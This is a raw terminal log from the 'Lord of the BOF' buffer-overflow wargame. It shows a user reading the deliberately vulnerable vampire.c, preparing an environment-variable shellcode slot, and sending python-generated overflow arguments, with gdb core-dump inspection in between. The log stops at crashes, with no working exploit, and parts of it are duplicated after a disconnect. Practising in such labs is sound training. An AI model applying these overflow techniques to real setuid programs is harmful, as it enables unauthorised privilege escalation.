Xshell 5 (Build 1339)
Copyright (c) 2002-2017 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[c:\~]$ 

Connecting to 192.168.235.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
  _______________________-------------------                       `\
 /:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
 |        The Lord of the BOF : The Fellowship of the BOF, 2010    |
 |                                                                  |
 |                                                                  |
  |       [enter to the dungeon]                                    |
  |       gate : gate                                                |
  |                                                                  |
  |       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
  |                                              ____________________|_
  |  ___________________-------------------------                      `\
  |/`--_                                                                 |
  ||[ ]||                                            ___________________/
   \===/___________________-------------------------- 


login: troll
Password: 
Login incorrect

login: troll
Password: 
[troll@localhost troll]$ ls
vampire  vampire.c
[troll@localhost troll]$  
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ 
[troll@localhost troll]$ ./vampire asdf
stack is still your friend.
[troll@localhost troll]$ cat vampire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
	char buffer[40];

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);
}
[troll@localhost troll]$ `python -c 'print"A"'`
bash: A: command not found
[troll@localhost troll]$ export shellcode`python -c 'print"A"'`
[troll@localhost troll]$ export                                
declare -x BASH_ENV="/home/troll/.bashrc"
declare -x DISPLAY="192.168.235.1:0.0"
declare -x HISTSIZE="1000"
declare -x HOME="/home/troll"
declare -x HOSTNAME="localhost.localdomain"
declare -x HOSTTYPE="i386"
declare -x INPUTRC="/etc/inputrc"
declare -x LANG="en_US"
declare -x LESSOPEN="|/usr/bin/lesspipe.sh %s"
declare -x LOGNAME="troll"
declare -x LS_COLORS="no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
declare -x MAIL="/var/spool/mail/troll"
declare -x OSTYPE="Linux"
declare -x PATH="/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/troll/bin"
declare -x REMOTEHOST="192.168.235.1"
declare -x SHELL="/bin/bash"
declare -x SHLVL="1"
declare -x TERM="xterm"
declare -x USER="troll"
declare -x USERNAME=""
[troll@localhost troll]$ export shellcode=`python -c 'print"A"'`
[troll@localhost troll]$ shellcode
bash: shellcode: command not found
[troll@localhost troll]$ 
[troll@localhost troll]$ $shellcode
bash: A: command not found
[troll@localhost troll]$ export shellcode=`python -c 'print"A"'`
[troll@localhost troll]$ export shellcode=`python -c 'print"ABAB"'`
[troll@localhost troll]$ $shellcode
bash: ABAB: command not found
[troll@localhost troll]$ ./getenv shellcode
bash: ./getenv: No such file or directory
[troll@localhost troll]$ ./getenv $shellcode
bash: ./getenv: No such file or directory
[troll@localhost troll]$ vi getenv.c
[troll@localhost troll]$ gcc getenv.c -o getenv
[troll@localhost troll]$ ./getenv $shellcode
========= : (nil)
[troll@localhost troll]$ ./getenv shellcode
========= : 0xbffffd2e
[troll@localhost troll]$ cat vampire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
	char buffer[40];

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);
}
[troll@localhost troll]$ 
Socket error Event: 32 Error: 10053.
Connection closing...Socket close.

Connection closed by foreign host.

Disconnected from remote host(LOB) at 17:55:19.

Type `help' to learn how to use Xshell prompt.
[c:\~]$ 





                printf("but it's not forever\n");
                exit(0);
        }

  strcpy(buffer, argv[1]); 
  printf("%s\n", buffer);
}
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xbfbf"'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xbf\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xbf\xff"'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xbf"'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xbf\xbf"'`
¿
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xbf\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xbf\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xbf\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xbf"'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
¿
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
argv error
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
argv error
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
argv error
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
argv error
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
argv error
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46+"\xff\xff"'`
stack is still your friend.
[troll@localhost troll]$ ????????????????????????????????????????????????????????????????????????????????????????????????????/
bash: ????????????????????????????????????????????????????????????????????????????????????????????????????/: No such file or directory
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46`
bash: unexpected EOF while looking for `''
bash: command substitution: line 2: syntax error
argv error
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*46'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*47'`
stack is still your friend.
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*488'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[troll@localhost troll]$ gdb -c core 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100 $esp
0xbffff960: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff970: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff980: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff990: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff9f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffa90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffaa0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffab0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffac0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffad0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffae0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbffffaf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbf00  0xbfbfbfbf
0xbffffb20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffb90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffba0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbe0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffbf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbffffc80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffffc90: 0xbfbfbfbf  0x454c00bf  0x504f5353  0x7c3d4e45
0xbffffca0: 0x7273752f  0x6e69622f  0x73656c2f  0x70697073
0xbffffcb0: 0x68732e65  0x00732520  0x52455355  0x454d414e
0xbffffcc0: 0x4948003d  0x49535453  0x313d455a  0x00303030
0xbffffcd0: 0x54534f48  0x454d414e  0x636f6c3d  0x6f686c61
0xbffffce0: 0x6c2e7473  0x6c61636f  0x616d6f64  0x4c006e69
0xbffffcf0: 0x414e474f  0x743d454d  0x6c6c6f72  0x4d455200
0xbffffd00: 0x4845544f  0x3d54534f  0x2e323931  0x2e383631
0xbffffd10: 0x2e353332  0x414d0031  0x2f3d4c49  0x2f726176
0xbffffd20: 0x6f6f7073  0x616d2f6c  0x742f6c69  0x6c6c6f72
0xbffffd30: 0x52455400  0x74783d4d  0x006d7265  0x54534f48
0xbffffd40: 0x45505954  0x3833693d  0x41500036  0x2f3d4854
0xbffffd50: 0x2f727375  0x61636f6c  0x69622f6c  0x622f3a6e
0xbffffd60: 0x2f3a6e69  0x2f727375  0x3a6e6962  0x7273752f
0xbffffd70: 0x3131582f  0x622f3652  0x2f3a6e69  0x656d6f68
0xbffffd80: 0x6f72742f  0x622f6c6c  0x48006e69  0x3d454d4f
0xbffffd90: 0x6d6f682f  0x72742f65  0x006c6c6f  0x55504e49
0xbffffda0: 0x3d435254  0x6374652f  0x706e692f  0x63727475
0xbffffdb0: 0x45485300  0x2f3d4c4c  0x2f6e6962  0x68736162
0xbffffdc0: 0x45535500  0x72743d52  0x006c6c6f  0x48534142
0xbffffdd0: 0x564e455f  0x6f682f3d  0x742f656d  0x6c6c6f72
0xbffffde0: 0x61622e2f  0x63726873  0x53494400  0x59414c50
0xbffffdf0: 0x3239313d  0x3836312e  0x3533322e  0x303a312e
0xbffffe00: 0x4c00302e  0x3d474e41  0x555f6e65  0x534f0053
(gdb) 
0xbffffe10: 0x45505954  0x6e694c3d  0x53007875  0x4c564c48
0xbffffe20: 0x4c00313d  0x4f435f53  0x53524f4c  0x3d6f6e3d
0xbffffe30: 0x663a3030  0x30303d69  0x3d69643a  0x333b3130
0xbffffe40: 0x6e6c3a34  0x3b31303d  0x703a3633  0x30343d69
0xbffffe50: 0x3a33333b  0x303d6f73  0x35333b31  0x3d64623a
0xbffffe60: 0x333b3034  0x31303b33  0x3d64633a  0x333b3034
0xbffffe70: 0x31303b33  0x3d726f3a  0x303b3130  0x37333b35
0xbffffe80: 0x3a31343b  0x303d696d  0x35303b31  0x3b37333b
0xbffffe90: 0x653a3134  0x31303d78  0x3a32333b  0x6d632e2a
0xbffffea0: 0x31303d64  0x3a32333b  0x78652e2a  0x31303d65
0xbffffeb0: 0x3a32333b  0x6f632e2a  0x31303d6d  0x3a32333b
0xbffffec0: 0x74622e2a  0x31303d6d  0x3a32333b  0x61622e2a
0xbffffed0: 0x31303d74  0x3a32333b  0x68732e2a  0x3b31303d
0xbffffee0: 0x2a3a3233  0x6873632e  0x3b31303d  0x2a3a3233
0xbffffef0: 0x7261742e  0x3b31303d  0x2a3a3133  0x7a67742e
0xbfffff00: 0x3b31303d  0x2a3a3133  0x6a72612e  0x3b31303d
0xbfffff10: 0x2a3a3133  0x7a61742e  0x3b31303d  0x2a3a3133
0xbfffff20: 0x687a6c2e  0x3b31303d  0x2a3a3133  0x70697a2e
0xbfffff30: 0x3b31303d  0x2a3a3133  0x303d7a2e  0x31333b31
0xbfffff40: 0x5a2e2a3a  0x3b31303d  0x2a3a3133  0x3d7a672e
0xbfffff50: 0x333b3130  0x2e2a3a31  0x3d327a62  0x333b3130
0xbfffff60: 0x2e2a3a31  0x303d7a62  0x31333b31  0x742e2a3a
0xbfffff70: 0x31303d7a  0x3a31333b  0x70722e2a  0x31303d6d
0xbfffff80: 0x3a31333b  0x70632e2a  0x303d6f69  0x31333b31
0xbfffff90: 0x6a2e2a3a  0x303d6770  0x35333b31  0x672e2a3a
(gdb) q
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*1000'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[troll@localhost troll]$ gdb -c core 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100 $esp
0xbffff760: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff770: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff780: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff790: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff7a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff7b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff7c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff7d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff7e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff7f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff800: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff810: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff820: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff830: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff840: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff850: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff860: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff870: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff880: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff890: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff8a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff8b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff8c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff8d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff8e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbffff8f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff900: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff910: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff920: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff930: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff940: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff950: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff960: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
